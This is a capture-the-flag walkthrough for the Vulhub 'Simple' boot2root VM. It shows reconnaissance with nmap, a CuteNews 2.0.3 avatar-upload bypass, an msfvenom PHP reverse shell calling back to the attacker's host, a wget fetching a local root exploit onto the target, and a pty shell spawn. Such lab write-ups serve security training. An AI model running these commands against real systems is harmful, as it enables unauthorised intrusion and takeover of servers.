SecTalks: BNE0x03 - Simple
May the LORD, my rock, be praised, who trains my hands for battle and my fingers for warfare. —- Psalm 144:1
From Vulhub Simple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal.
- Burp Suite
Detail Assessment and Planning
- Port scan to identify opened ports, running services and services version. —Nmap
- Search the web app vulnerability — searchsploit
- Generate and upload webshell —metasploit
- Get root
Weaknesses and Strengths
Use netdiscover to detect target IP address
netdiscover -i eth0 -r 192.168.79.0/24
192.168.79.172 is the target.
Then run nmap to detect opening ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.79.172 -p-
Only port 80 is opening. Lets use Iceweasel to view the page.
I noticed that the web app is Cutenews 2.0.3. search the exploit:
find the interesting results:
The exploit is as follow:
- Sign up for New User
- Log In
- Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
- Select Upload Avatar Example: Evil.jpg
- use tamper data & Rename File Evil.jpg to Evil.php
Okay, firstly, I creat a reverse php shell,
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.79.156 LPORT=1234 -a php --platform php -o evil.jpg
Now, use Burp as proxy, go to Personal options http://192.168.79.172/cutenews/index.php?mod=main&opt=personal to upload evil.jpg
in the burp, change the evil.jgp to evil.php
After that, Burp will recevied a GET request:
set metasploit multi/handler.
now go to http://192.168.79.172/uploads/avatar_bob1bob2.php will get meterpreter reverse shell:
However, I am not the root, search the os version:
search the ubuntu 14.04
searchsploit ubuntu 14.04 and we get the result:
Move the file to /var/www/html/ and in reverse shell:
wget http://192.168.79.156/37292.c -O hack.c
gcc hack.c -o hack -static, run it.
python -c 'import pty; pty.spawn("/bin/bash")' to get the shell.